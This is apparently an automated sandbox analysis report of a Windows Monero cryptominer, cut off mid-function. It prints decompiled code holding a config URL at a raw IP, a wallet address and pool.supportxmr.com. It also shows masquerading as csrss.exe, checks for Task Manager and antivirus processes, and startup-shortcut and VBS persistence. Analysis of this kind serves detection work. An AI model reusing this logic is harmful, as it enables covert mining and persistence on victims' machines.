Instruction Fuzzy Hash: B0F14B75D40326EBEF31ABA99C45BDE36B8BB10F5DF06006CEA05A6142E7709D44CB53

Uniqueness

Uniqueness Score: -1.00%

Function 013C3220, Relevance: 61.5, APIs: 3, Strings: 32, Instructions: 237
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E013C3220(void* __ecx, void* __esi, void* __eflags) {
				intOrPtr _t10;
				intOrPtr _t14;
				void* _t17;
				intOrPtr _t19;
				intOrPtr _t27;
				void* _t31;
				void* _t35;
				long _t37;
				short _t38;
				void* _t41;
				void* _t43;
				struct HINSTANCE__* _t44;
				struct HINSTANCE__* _t46;
				struct HINSTANCE__* _t48;
				struct HINSTANCE__* _t50;
				struct HINSTANCE__* _t52;
				struct HINSTANCE__* _t54;
				intOrPtr _t56;
				struct HINSTANCE__* _t58;
				struct HINSTANCE__* _t60;
				void* _t67;
				void* _t70;
				void* _t73;

				_t67 = __esi;
				_t43 = __ecx;
				 *0x1591300 = 0;
				 *0x1591304 = 0;
				 *0x1591308 = 0;
				 *0x159130c = 0;
				 *0x1591310 = 0x7530;
				 *0x1591238 = 0x5f;
				 *0x15912bc = 0x18;
				 *0x15919ac = 0x20;
				 *0x15919b0 = 5;
				 *0x1591318 = 0;
				 *0x159131c = 0;
				 *0x1591320 = 0;
				 *0x1591bb8 = 1;
				 *0x1591bbc = 0xa;
				 *0x1591bc0 = 0;
				 *0x1591c24 = 0;
				 *0x159210c = 1;
				E013C1BB0(0x159208c, 0, 0x80);
				E013C17E0(0x159208c, "[no-email]");
				E013C17E0("d06ed635-68f6-4e9a-955c-4899f5f57b9a", "GUID_ERROR");
				asm("xorps xmm0, xmm0");
				 *0x1591c48 = 0;
				asm("movups [0x1591c28], xmm0");
				asm("movups [0x1591c38], xmm0");
				E013C1BB0("C:\ProgramData\LKBNMTFJgl", 0, 0x208);
				E013C1BB0("csrss.exe", 0, 0x60);
				asm("xorps xmm0, xmm0");
				asm("movups [0x159158c], xmm0");
				asm("movups [0x159159c], xmm0");
				E013C1BB0(0x15919b4, 0, 0x200);
				E013C1BB0(0x15912c0, 0, 0x40);
				E013C1640(0x15912c0, 0x13c9df0, 0x40);
				E013C1BB0("http://45.144.225.135/config.txt", 0, 0x200);
				_t10 =  *0x15919ac; // 0x20
				E013C1640("http://45.144.225.135/config.txt", 0x13c9e30, _t10 + 1);
				E013C1BB0("FALSE", 0, 0x200);
				_t14 =  *0x15919b0; // 0x5
				E013C1640("FALSE", "FALSE", _t14 + 1);
				_t17 = E013C17B0("FALSE", "http://45.144.225.135/config.txt");
				_t73 = _t70 + 0x90;
				if(_t17 != 0) {
					E013C1CE0("0125789244697858", 0x10, "http://45.144.225.135/config.txt",  *0x15919ac);
					_t41 = E013C17B0("FALSE", "FALSE");
					_t73 = _t73 + 0x18;
					if(_t41 != 0) {
						E013C1CE0("0125789244697858", 0x10, "FALSE",  *0x15919b0);
						_t73 = _t73 + 0x10;
					}
				}
				_t19 = E013C8270(_t43, GetCurrentProcess());
				 *0x1591314 = _t19;
				if(_t19 != 0) {
					E013C8DD0();
					_t60 =  *0x1591318; // 0x0
					_t61 =  ==  ? 1 : _t60;
					 *0x1591318 =  ==  ? 1 : _t60;
				}
				_push(_t67);
				E013C17B0("TRUE", "TRUE");
				_t44 =  *0x1591300; // 0x1
				_t45 =  ==  ? 1 : _t44;
				 *0x1591300 =  ==  ? 1 : _t44;
				E013C17B0("TASKMGR", "TASKMGR");
				_t46 =  *0x1591304; // 0x1
				_t47 =  ==  ? 1 : _t46;
				 *0x1591304 =  ==  ? 1 : _t46;
				E013C17B0("1THREAD", "50%CPU");
				_t48 =  *0x1591308; // 0x2
				_t49 =  ==  ? 1 : _t48;
				 *0x1591308 =  ==  ? 1 : _t48;
				E013C17B0("50%CPU", "50%CPU");
				_t50 =  *0x1591308; // 0x2
				_t51 =  ==  ? 2 : _t50;
				 *0x1591308 =  ==  ? 2 : _t50;
				E013C17B0("100%CPU", "50%CPU");
				_t52 =  *0x1591308; // 0x2
				_t53 =  ==  ? 3 : _t52;
				 *0x1591308 =  ==  ? 3 : _t52;
				E013C17B0("100%CPU", "100%CPU");
				_t54 =  *0x159130c; // 0x1
				_t55 =  ==  ? 1 : _t54;
				 *0x1591bb4 = 0x1e;
				 *0x159130c =  ==  ? 1 : _t54;
				E013C1BB0("48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW", 0, 0x100);
				_t27 =  *0x1591238; // 0x5f
				E013C1640("48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW", 0x13c9f40, _t27 + 1);
				E013C1CE0("0125789244697858", 0x10, "48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW",  *0x1591238);
				_t31 = E013C1BE0("48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW",  *0x1591238);
				E013C1BB0("pool.supportxmr.com:3333", 0, 0x80);
				_t56 =  *0x15912bc; // 0x18
				E013C1640("pool.supportxmr.com:3333", 0x13ca018, _t56 + 1);
				E013C1CE0("0125789244697858", 0x10, "pool.supportxmr.com:3333",  *0x15912bc);
				_t35 = E013C1BE0("pool.supportxmr.com:3333",  *0x15912bc);
				if(_t31 != 0xd82f1fb8 || _t35 != 0x789308d0) {
					ExitProcess(0x27);
				}
				E013C18D0("pool.supportxmr.com:3333", "nicehash.com");
				_t58 =  *0x159131c; // 0x0
				_t59 =  !=  ? 1 : _t58;
				 *0x159131c =  !=  ? 1 : _t58;
				_t37 = GetModuleFileNameW(0, "C:\Users\jones\AppData\Local\Temp\tmp70CEtmp.exe", 0x200);
				if(_t37 == 0 || _t37 == 0x200) {
					_t38 = 0;
					 *0x1591c4c = 0;
					goto L12;
				} else {
					_t38 = E013C8B20("C:\Users\jones\AppData\Local\Temp\tmp70CEtmp.exe", "d572da9202196121d952231f26d65d07");
					if(_t38 == 0) {
						L12:
						 *0x1591c28 = 0;
						 *0x1592110 = 0;
						return _t38;
					} else {
						 *0x1591c48 = 0;
						 *0x1592110 = 0;
						return _t38;
					}
				}
			}

0x013c3220
0x013c3220
0x013c322c
0x013c3236
0x013c3240
0x013c324a
0x013c3254
0x013c325e
0x013c3268
0x013c3272
0x013c327c
0x013c3286
0x013c3290
0x013c329a
0x013c32a4
0x013c32ae
0x013c32b8
0x013c32c2
0x013c32cc
0x013c32d6
0x013c32e5
0x013c32f4
0x013c32fe
0x013c3301
0x013c3312
0x013c3319
0x013c3320
0x013c332e
0x013c3338
0x013c3342
0x013c3349
0x013c3350
0x013c3361
0x013c3372
0x013c3383
0x013c3388
0x013c3399
0x013c33aa
0x013c33af
0x013c33c0
0x013c33d2
0x013c33d7
0x013c33dc
0x013c33f0
0x013c33ff
0x013c3404
0x013c3409
0x013c341d
0x013c3422
0x013c3422
0x013c3409
0x013c342d
0x013c3435
0x013c3441
0x013c3443
0x013c3448
0x013c3450
0x013c3453
0x013c3453
0x013c3459
0x013c3464
0x013c3469
0x013c3476
0x013c347e
0x013c3484
0x013c3489
0x013c3496
0x013c349e
0x013c34a4
0x013c34a9
0x013c34b6
0x013c34be
0x013c34c4
0x013c34c9
0x013c34d6
0x013c34e3
0x013c34e9
0x013c34ee
0x013c34fb
0x013c3508
0x013c350e
0x013c3513
0x013c3520
0x013c3523
0x013c3534
0x013c353a
0x013c353f
0x013c3550
0x013c356a
0x013c357a
0x013c358d
0x013c3592
0x013c35a4
0x013c35bb
0x013c35ce
0x013c35dd
0x013c3673
0x013c3673
0x013c35f8
0x013c35fd
0x013c3608
0x013c3617
0x013c361d
0x013c3626
0x013c3657
0x013c3659
0x00000000
0x013c362f
0x013c3639
0x013c3643
0x013c365f
0x013c365f
0x013c3666
0x013c3670
0x013c3645
0x013c3645
0x013c364c
0x013c3656
0x013c3656
0x013c3643

APIs

GetCurrentProcess.KERNEL32(73B74D40), ref: 013C3426
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe,00000200), ref: 013C361D

Strings

1THREAD, xrefs: 013C3499
FALSE, xrefs: 013C33B6
50%CPU, xrefs: 013C34B1
viTRMUuKeV, xrefs: 013C3342
d572da9202196121d952231f26d65d07, xrefs: 013C3312, 013C362F, 013C365F
C:\ProgramData\LKBNMTFJgl, xrefs: 013C330D
TRUE, xrefs: 013C345A
d06ed635-68f6-4e9a-955c-4899f5f57b9a, xrefs: 013C32EF
C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe, xrefs: 013C3610, 013C3634, 013C3659
50%CPU, xrefs: 013C34D9
TASKMGR, xrefs: 013C3479
0125789244697858, xrefs: 013C35B6
50%CPU, xrefs: 013C34B9
[no-email], xrefs: 013C32DB
FALSE, xrefs: 013C33FA
TRUE, xrefs: 013C345F
pool.supportxmr.com:3333, xrefs: 013C3586, 013C359F, 013C35AF, 013C35C9, 013C35F3
0125789244697858, xrefs: 013C33EB
100%CPU, xrefs: 013C34DE
50%CPU, xrefs: 013C3491
48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW, xrefs: 013C352F, 013C354B, 013C355E, 013C3575
http://45.144.225.135/config.txt, xrefs: 013C337E, 013C3394, 013C33C8, 013C33E4
100%CPU, xrefs: 013C3503
100%CPU, xrefs: 013C34FE
FALSE, xrefs: 013C33A5, 013C33BB, 013C33F5, 013C3411
TASKMGR, xrefs: 013C3471
csrss.exe, xrefs: 013C3329
0125789244697858, xrefs: 013C3418
GUID_ERROR, xrefs: 013C32EA
nicehash.com, xrefs: 013C35EE
FALSE, xrefs: 013C33CD
0125789244697858, xrefs: 013C3565

Memory Dump Source

Source File: 0000000E.00000002.909418547.00000000013C0000.00000040.00000001.sdmp, Offset: 013C0000, based on PE: true

Yara matches

Similarity

API ID: CurrentFileModuleNameProcess
String ID: 0125789244697858$0125789244697858$0125789244697858$0125789244697858$100%CPU$100%CPU$100%CPU$1THREAD$48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW$50%CPU$50%CPU$50%CPU$50%CPU$C:\ProgramData\LKBNMTFJgl$C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe$FALSE$FALSE$FALSE$FALSE$GUID_ERROR$TASKMGR$TASKMGR$TRUE$TRUE$[no-email]$csrss.exe$d06ed635-68f6-4e9a-955c-4899f5f57b9a$d572da9202196121d952231f26d65d07$http://45.144.225.135/config.txt$nicehash.com$pool.supportxmr.com:3333$viTRMUuKeV
API String ID: 2251294070-64705920
Opcode ID: 29915015e8deac40a69f5b25e4d069f337f4f9f4e6e8a462f2010770d31d82cb
Instruction ID: fd0800ff13672e04a4d517f112d30aa75f924017abd41eeccb2e29fcd394aa70
Opcode Fuzzy Hash: 29915015e8deac40a69f5b25e4d069f337f4f9f4e6e8a462f2010770d31d82cb
Instruction Fuzzy Hash: CD91C874780B23AAEF206B26DCC6B1636A5A710F6DF07414CE5206D286DBF59818AB47

Uniqueness

Uniqueness Score: -1.00%

Function 013C4B00, Relevance: 54.5, APIs: 20, Strings: 11, Instructions: 266
networkCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E013C4B00(void* __ecx, void* __edx, void* __eflags, char* _a4) {
				void* _v8;
				void _v12;
				void* _v16;
				void* _v20;
				long _v24;
				long _v28;
				long _v32;
				char* _v36;
				char* _v40;
				char* _v44;
				char* _v48;
				char* _v52;
				intOrPtr _v56;
				intOrPtr _v64;
				char* _v68;
				short _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v104;
				char _v108;
				void* _v112;
				long _t54;
				int _t55;
				void* _t61;
				void* _t62;
				void* _t71;
				long _t87;
				char* _t91;
				long _t108;
				void* _t111;
				char* _t118;
				long _t119;
				char* _t123;
				void* _t126;
				void* _t128;
				void* _t134;
				void* _t136;
				void* _t137;
				void* _t138;
				void* _t139;
				void* _t140;

				E013C1BB0( &_v108, 0, 0x38);
				_t118 = _a4;
				_v24 = 0;
				_t108 = 0;
				_v112 = 0x3c;
				_v92 = 0xffffffff;
				_v104 = 0xffffffff;
				_v64 = 0xffffffff;
				_v56 = 0xffffffff;
				_t54 = E013C1850(_t118);
				_t136 = _t134 + 0x10;
				_t55 = InternetCrackUrlA(_t118, _t54, 0,  &_v112);
				if(_t55 != 0) {
					_t123 = E013C15E0(_v92 + 1);
					E013C1BB0(_t123, 0, _v92 + 1);
					E013C1640(_t123, _v96, _v92);
					_t137 = _t136 + 0x1c;
					_t61 = InternetOpenA("WinInetGet/0.1", 0, 0, 0, 0);
					_v8 = _t61;
					if(_t61 != 0) {
						_t62 = InternetConnectA(_t61, _t123, _v88, 0, 0, 3, 0, 0);
						_v20 = _t62;
						_push(_t123);
						if(_t62 != 0) {
							E013C1510();
							E013C18D0(_t118, "https://");
							_t138 = _t137 + 0xc;
							_v52 = "text/*";
							_v48 = "application/exe";
							_v44 = "application/zlib";
							_t125 =  !=  ? 0x84ecf300 : 0x846cf300;
							_v40 = "application/gzip";
							_v36 = "application/applefile";
							_v32 = 0;
							_t126 = HttpOpenRequestA(_v20, "GET", _v68, 0, 0,  &_v52,  !=  ? 0x84ecf300 : 0x846cf300, 0);
							_v16 = _t126;
							if(_t126 == 0) {
								L26:
								InternetCloseHandle(_v20);
								InternetCloseHandle(_v8);
								return 0;
							} else {
								_t71 = E013C18D0(_t118, "https://");
								_t139 = _t138 + 8;
								if(_t71 == 0) {
									L10:
									if(HttpSendRequestA(_t126, 0, 0, 0, 0) == 0) {
										goto L25;
									} else {
										_t119 = 0x400;
										_t128 = E013C15E0(0x400);
										_t140 = _t139 + 4;
										if(_t128 == 0) {
											_t126 = _v16;
											goto L25;
										} else {
											do {
												if(InternetReadFile(_v16, _t128 + _t108, _t119,  &_v24) == 0) {
													if(GetLastError() != 0x7a) {
														E013C1510(_t128);
														L23:
														InternetCloseHandle(_v16);
														InternetCloseHandle(_v20);
														InternetCloseHandle(_v8);
														return 0;
													} else {
														_t119 = _t119 + 0x400;
														goto L17;
													}
												} else {
													_t87 = _v24;
													if(_t87 == 0) {
														InternetCloseHandle(_v16);
														InternetCloseHandle(_v20);
														_t111 = _v8;
														InternetCloseHandle(_t111);
														_t91 = E013C18D0(_t128, ";End");
														if(_t91 != 0) {
															 *_t91 = 0;
															return _t128;
														} else {
															E013C1510(_t128);
															InternetCloseHandle(_v16);
															InternetCloseHandle(_v20);
															InternetCloseHandle(_t111);
															return 0;
														}
													} else {
														_t108 = _t108 + _t87;
														goto L17;
													}
												}
												goto L27;
												L17:
												_t128 = E013C16A0(_t128, _t119 + _t108);
												_t140 = _t140 + 8;
											} while (_t128 != 0);
											goto L23;
										}
									}
								} else {
									_v12 = 0;
									_v28 = 4;
									if(InternetQueryOptionA(_t126, 0x1f,  &_v12,  &_v28) == 0) {
										L25:
										InternetCloseHandle(_t126);
										goto L26;
									} else {
										_v12 = _v12 | 0x00000180;
										if(InternetSetOptionA(_t126, 0x1f,  &_v12, 4) == 0) {
											goto L25;
										} else {
											goto L10;
										}
									}
								}
							}
						} else {
							E013C1510();
							InternetCloseHandle(_v8);
							return 0;
						}
					} else {
						E013C1510(_t123);
						return 0;
					}
				} else {
					return _t55;
				}
				L27:
			}

0x013c4b10
0x013c4b15
0x013c4b1e
0x013c4b25
0x013c4b27
0x013c4b2e
0x013c4b35
0x013c4b3f
0x013c4b46
0x013c4b4d
0x013c4b52
0x013c4b57
0x013c4b5f
0x013c4b75
0x013c4b7c
0x013c4b88
0x013c4b8d
0x013c4b9d
0x013c4ba3
0x013c4ba8
0x013c4bcb
0x013c4bd1
0x013c4bd4
0x013c4bd7
0x013c4bf4
0x013c4c04
0x013c4c09
0x013c4c0c
0x013c4c15
0x013c4c21
0x013c4c28
0x013c4c2b
0x013c4c38
0x013c4c47
0x013c4c58
0x013c4c5a
0x013c4c5f
0x013c4db8
0x013c4dbb
0x013c4dca
0x013c4dd4
0x013c4c65
0x013c4c6b
0x013c4c70
0x013c4c75
0x013c4cb8
0x013c4cc9
0x00000000
0x013c4ccf
0x013c4ccf
0x013c4cda
0x013c4cdc
0x013c4ce1
0x013c4dad
0x00000000
0x013c4ce7
0x013c4ce7
0x013c4cfb
0x013c4d11
0x013c4d86
0x013c4d8e
0x013c4d9a
0x013c4d9f
0x013c4da2
0x013c4dac
0x013c4d13
0x013c4d13
0x00000000
0x013c4d13
0x013c4cfd
0x013c4cfd
0x013c4d02
0x013c4d31
0x013c4d40
0x013c4d42
0x013c4d46
0x013c4d4e
0x013c4d58
0x013c4d79
0x013c4d84
0x013c4d5a
0x013c4d5b
0x013c4d66
0x013c4d6b
0x013c4d6e
0x013c4d78
0x013c4d78
0x013c4d04
0x013c4d04
0x00000000
0x013c4d04
0x013c4d02
0x00000000
0x013c4d19
0x013c4d23
0x013c4d25
0x013c4d28
0x00000000
0x013c4d2c
0x013c4ce1
0x013c4c77
0x013c4c7a
0x013c4c81
0x013c4c94
0x013c4db0
0x013c4db6
0x00000000
0x013c4c9a
0x013c4c9a
0x013c4cb2
0x00000000
0x00000000
0x00000000
0x00000000
0x013c4cb2
0x013c4c94
0x013c4c75
0x013c4bd9
0x013c4bd9
0x013c4be5
0x013c4bf3
0x013c4bf3
0x013c4baa
0x013c4bab
0x013c4bbb
0x013c4bbb
0x013c4b66
0x013c4b66
0x013c4b66
0x00000000

APIs

InternetCrackUrlA.WININET(73BCEA30,00000000,?,?,00000000,00000000), ref: 013C4B57
InternetOpenA.WININET(WinInetGet/0.1,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 013C4B9D

Strings

application/gzip, xrefs: 013C4C2B
application/exe, xrefs: 013C4C15
;End, xrefs: 013C4D48
application/applefile, xrefs: 013C4C38
<, xrefs: 013C4B27
GET, xrefs: 013C4C4A
text/*, xrefs: 013C4C0C
https://, xrefs: 013C4C65
https://, xrefs: 013C4BF9
application/zlib, xrefs: 013C4C21
WinInetGet/0.1, xrefs: 013C4B98

Memory Dump Source

Source File: 0000000E.00000002.909418547.00000000013C0000.00000040.00000001.sdmp, Offset: 013C0000, based on PE: true

Yara matches

Similarity

API ID: Internet$CrackOpen
String ID: ;End$<$GET$WinInetGet/0.1$application/applefile$application/exe$application/gzip$application/zlib$https://$https://$text/*
API String ID: 1262293563-2187584305
Opcode ID: 1e07297ef3c6b60784f24595c6cab0f381961ac8d5a4243bce6fdc666de70e07
Instruction ID: fb99e87ebb8a897c541f05815ba4ff13991f95e36b063f722ab2b0cc679c0855
Opcode Fuzzy Hash: 1e07297ef3c6b60784f24595c6cab0f381961ac8d5a4243bce6fdc666de70e07
Instruction Fuzzy Hash: C3819B71E00219AFDB21ABA5EC45FAE7BBCEF44B58F140169F904E6281E7319D009B95

Uniqueness

Uniqueness Score: -1.00%

Function 013C7C30, Relevance: 47.5, APIs: 17, Strings: 10, Instructions: 241
networkCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E013C7C30(void* __ecx, void* __edx, void* __eflags, char* _a4, intOrPtr* _a8) {
				void _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				long _v24;
				long _v28;
				long _v32;
				char* _v36;
				char* _v40;
				char* _v44;
				char* _v48;
				char* _v52;
				intOrPtr _v56;
				intOrPtr _v64;
				char* _v68;
				short _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v104;
				char _v108;
				void* _v112;
				long _t53;
				int _t54;
				void* _t62;
				void* _t63;
				void* _t72;
				long _t88;
				long _t103;
				char* _t108;
				intOrPtr _t109;
				char* _t111;
				void* _t114;
				long _t116;
				void* _t123;
				void* _t125;
				void* _t126;
				void* _t127;
				void* _t128;
				void* _t129;

				E013C1BB0( &_v108, 0, 0x38);
				_t108 = _a4;
				_v24 = 0;
				_t103 = 0;
				_v112 = 0x3c;
				_v92 = 0xffffffff;
				_v104 = 0xffffffff;
				_v64 = 0xffffffff;
				_v56 = 0xffffffff;
				_t53 = E013C1850(_t108);
				_t125 = _t123 + 0x10;
				_t54 = InternetCrackUrlA(_t108, _t53, 0,  &_v112);
				if(_t54 != 0) {
					_t111 = E013C15E0(_v92 + 1);
					E013C1BB0(_t111, 0, _v92 + 1);
					E013C1640(_t111, _v96, _v92);
					_t126 = _t125 + 0x1c;
					_t62 = InternetOpenA("WinInetGet/0.1", 0, 0, 0, 0);
					_v20 = _t62;
					if(_t62 != 0) {
						_t63 = InternetConnectA(_t62, _t111, _v88, 0, 0, 3, 0, 0);
						_v16 = _t63;
						_push(_t111);
						if(_t63 != 0) {
							E013C1510();
							E013C18D0(_t108, "https://");
							_t127 = _t126 + 0xc;
							_v52 = "text/*";
							_v48 = "application/exe";
							_v44 = "application/zlib";
							_t113 =  !=  ? 0x84ecf300 : 0x846cf300;
							_v40 = "application/gzip";
							_v36 = "application/applefile";
							_v32 = 0;
							_t114 = HttpOpenRequestA(_v16, "GET", _v68, 0, 0,  &_v52,  !=  ? 0x84ecf300 : 0x846cf300, 0);
							_v12 = _t114;
							if(_t114 == 0) {
								L24:
								InternetCloseHandle(_v16);
								InternetCloseHandle(_v20);
								return 0;
							} else {
								_t72 = E013C18D0(_t108, "https://");
								_t128 = _t127 + 8;
								if(_t72 == 0) {
									L10:
									if(HttpSendRequestA(_t114, 0, 0, 0, 0) == 0) {
										goto L23;
									} else {
										_t116 = 0x400;
										_t109 = E013C15E0(0x400);
										_t129 = _t128 + 4;
										if(_t109 == 0) {
											_t114 = _v12;
											goto L23;
										} else {
											do {
												if(InternetReadFile(_v12, _t109 + _t103, _t116,  &_v24) == 0) {
													if(GetLastError() != 0x7a) {
														E013C1510(_t109);
														L21:
														InternetCloseHandle(_v12);
														InternetCloseHandle(_v16);
														InternetCloseHandle(_v20);
														return 0;
													} else {
														_t116 = _t116 + 0x400;
														goto L15;
													}
												} else {
													_t88 = _v24;
													if(_t88 == 0) {
														InternetCloseHandle(_v12);
														InternetCloseHandle(_v16);
														InternetCloseHandle(_v20);
														 *_a8 = _t109;
														return _t103;
													} else {
														_t103 = _t103 + _t88;
														goto L15;
													}
												}
												goto L25;
												L15:
												_t109 = E013C16A0(_t109, _t116 + _t103);
												_t129 = _t129 + 8;
											} while (_t109 != 0);
											goto L21;
										}
									}
								} else {
									_v8 = 0;
									_v28 = 4;
									if(InternetQueryOptionA(_t114, 0x1f,  &_v8,  &_v28) == 0) {
										L23:
										InternetCloseHandle(_t114);
										goto L24;
									} else {
										_v8 = _v8 | 0x00000180;
										if(InternetSetOptionA(_t114, 0x1f,  &_v8, 4) == 0) {
											goto L23;
										} else {
											goto L10;
										}
									}
								}
							}
						} else {
							E013C1510();
							InternetCloseHandle(_v20);
							return 0;
						}
					} else {
						E013C1510(_t111);
						return 0;
					}
				} else {
					return _t54;
				}
				L25:
			}

0x013c7c40
0x013c7c45
0x013c7c4e
0x013c7c55
0x013c7c57
0x013c7c5e
0x013c7c65
0x013c7c6f
0x013c7c76
0x013c7c7d
0x013c7c82
0x013c7c87
0x013c7c8f
0x013c7ca2
0x013c7cac
0x013c7cb8
0x013c7cbd
0x013c7ccd
0x013c7cd3
0x013c7cd8
0x013c7cfb
0x013c7d01
0x013c7d04
0x013c7d07
0x013c7d23
0x013c7d33
0x013c7d38
0x013c7d3b
0x013c7d44
0x013c7d50
0x013c7d57
0x013c7d5a
0x013c7d67
0x013c7d76
0x013c7d87
0x013c7d89
0x013c7d8e
0x013c7eb2
0x013c7eb5
0x013c7ec3
0x013c7ecd
0x013c7d94
0x013c7d9a
0x013c7d9f
0x013c7da4
0x013c7de7
0x013c7df8
0x00000000
0x013c7dfe
0x013c7dfe
0x013c7e09
0x013c7e0b
0x013c7e10
0x013c7ea7
0x00000000
0x013c7e16
0x013c7e16
0x013c7e2a
0x013c7e53
0x013c7e81
0x013c7e89
0x013c7e92
0x013c7e97
0x013c7e9c
0x013c7ea6
0x013c7e55
0x013c7e55
0x00000000
0x013c7e55
0x013c7e2c
0x013c7e2c
0x013c7e31
0x013c7e66
0x013c7e6b
0x013c7e70
0x013c7e78
0x013c7e7f
0x013c7e33
0x013c7e33
0x00000000
0x013c7e33
0x013c7e31
0x00000000
0x013c7e35
0x013c7e3f
0x013c7e41
0x013c7e44
0x00000000
0x013c7e48
0x013c7e10
0x013c7da6
0x013c7da9
0x013c7db0
0x013c7dc3
0x013c7eaa
0x013c7eb0
0x00000000
0x013c7dc9
0x013c7dc9
0x013c7de1
0x00000000
0x00000000
0x00000000
0x00000000
0x013c7de1
0x013c7dc3
0x013c7da4
0x013c7d09
0x013c7d09
0x013c7d14
0x013c7d22
0x013c7d22
0x013c7cda
0x013c7cdb
0x013c7ceb
0x013c7ceb
0x013c7c96
0x013c7c96
0x013c7c96
0x00000000

APIs

InternetCrackUrlA.WININET(00000044,00000000,?,?,?,00000000), ref: 013C7C87
InternetOpenA.WININET(WinInetGet/0.1,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 013C7CCD

Strings

application/gzip, xrefs: 013C7D5A
application/zlib, xrefs: 013C7D50
https://, xrefs: 013C7D28
WinInetGet/0.1, xrefs: 013C7CC8
application/exe, xrefs: 013C7D44
GET, xrefs: 013C7D79
application/applefile, xrefs: 013C7D67
<, xrefs: 013C7C57
https://, xrefs: 013C7D94
text/*, xrefs: 013C7D3B

Memory Dump Source

Source File: 0000000E.00000002.909418547.00000000013C0000.00000040.00000001.sdmp, Offset: 013C0000, based on PE: true

Yara matches

Similarity

API ID: Internet$CrackOpen
String ID: <$GET$WinInetGet/0.1$application/applefile$application/exe$application/gzip$application/zlib$https://$https://$text/*
API String ID: 1262293563-3953569400
Opcode ID: 6ffd735af9d5810e30893f5820c1fbb904b4cc885ec1fba0718f380d76c64e69
Instruction ID: 3b001e15a1830dca06f7e0955f75d17e7f43137dba07b619f083c0486644fbd3
Opcode Fuzzy Hash: 6ffd735af9d5810e30893f5820c1fbb904b4cc885ec1fba0718f380d76c64e69
Instruction Fuzzy Hash: B7719871E00219AFEB219FA9DC45BAE7BBCEF44B68F140169FD04E6180E7319D119F94

Uniqueness

Uniqueness Score: -1.00%

Function 013C65D0, Relevance: 40.5, APIs: 5, Strings: 18, Instructions: 212
sleepfileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E013C65D0(void* __eflags) {
				short _v524;
				short _v1044;
				short _v1564;
				char _v2588;
				char _v3612;
				char _v4636;
				void* _t61;
				void* _t69;
				void* _t71;
				void* _t73;
				void* _t100;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t128;
				void* _t134;
				void* _t141;
				void* _t142;
				void* _t143;
				void* _t144;
				void* _t145;
				void* _t146;
				void* _t150;

				E013C1A00( &_v524, "C:\ProgramData\LKBNMTFJgl");
				E013C1970( &_v524, "\\");
				E013C1970( &_v524, "csrss.exe");
				 *((short*)(_t141 + E013C1B40( &_v524) * 2 - 0x210)) = 0;
				E013C1A00( &_v1044, "C:\ProgramData\LKBNMTFJgl");
				E013C1970( &_v1044, L"\\r.vbs");
				_t61 = E013C7FA0(0,  &_v3612, 0x13caad0, 7);
				_t143 = _t142 + 0x38;
				if(_t61 != 0) {
					E013C1970( &_v3612, "\\");
					E013C1970( &_v3612, "viTRMUuKeV");
					E013C1970( &_v3612, L".url");
					_t69 = E013C6340( &_v524);
					_t144 = _t143 + 0x1c;
					__eflags = _t69;
					if(_t69 == 0) {
						goto L1;
					} else {
						_t71 = E013C7EF0("a2guard.exe");
						_t145 = _t144 + 4;
						__eflags = _t71;
						if(_t71 != 0) {
							L10:
							_t73 = E013C7ED0( &_v3612);
							_t146 = _t145 + 4;
							__eflags = _t73;
							if(_t73 != 0) {
								goto L13;
							} else {
								E013C1A00( &_v4636, L"[InternetShortcut]\r\nURL=\"file:///");
								E013C1970( &_v4636,  &_v524);
								E013C1970( &_v4636, L".exe\"");
								_t100 = E013C7AF0( &_v3612,  &_v4636);
								_t146 = _t146 + 0x20;
								__eflags = _t100;
								if(_t100 != 0) {
									goto L13;
								} else {
									goto L12;
								}
							}
						} else {
							_t102 = E013C7EF0("a2service.exe");
							_t145 = _t145 + 4;
							__eflags = _t102;
							if(_t102 != 0) {
								goto L10;
							} else {
								_t103 = E013C7EF0("a2start.exe");
								_t145 = _t145 + 4;
								__eflags = _t103;
								if(_t103 != 0) {
									goto L10;
								} else {
									_t105 = E013C7ED0( &_v3612);
									_t146 = _t145 + 4;
									__eflags = _t105;
									if(_t105 != 0) {
										L13:
										E013C6990( &_v3612);
										E013C1A00( &_v1564,  &_v524);
										E013C1970( &_v1564, L".exe");
										DeleteFileW( &_v1564);
										MoveFileW( &_v524,  &_v1564);
										E013C68E0( &_v1564);
										DeleteFileW( &_v524);
										return 1;
									} else {
										E013C1A00( &_v2588, L"Set objFSO=CreateObject(\"Scripting.FileSystemObject\")\r\n");
										E013C1970( &_v2588, L"outFile=\"");
										E013C1970( &_v2588,  &_v3612);
										E013C1970( &_v2588, L"\"\r\n");
										E013C1970( &_v2588, L"Set objFile = objFSO.CreateTextFile(outFile,True)\r\n");
										E013C1970( &_v2588, L"objFile.Write \"[InternetShortcut]\" & vbCrLf & \"URL=\"\"file:///");
										E013C1970( &_v2588,  &_v524);
										E013C1970( &_v2588, L".exe\"\"\"\r\n");
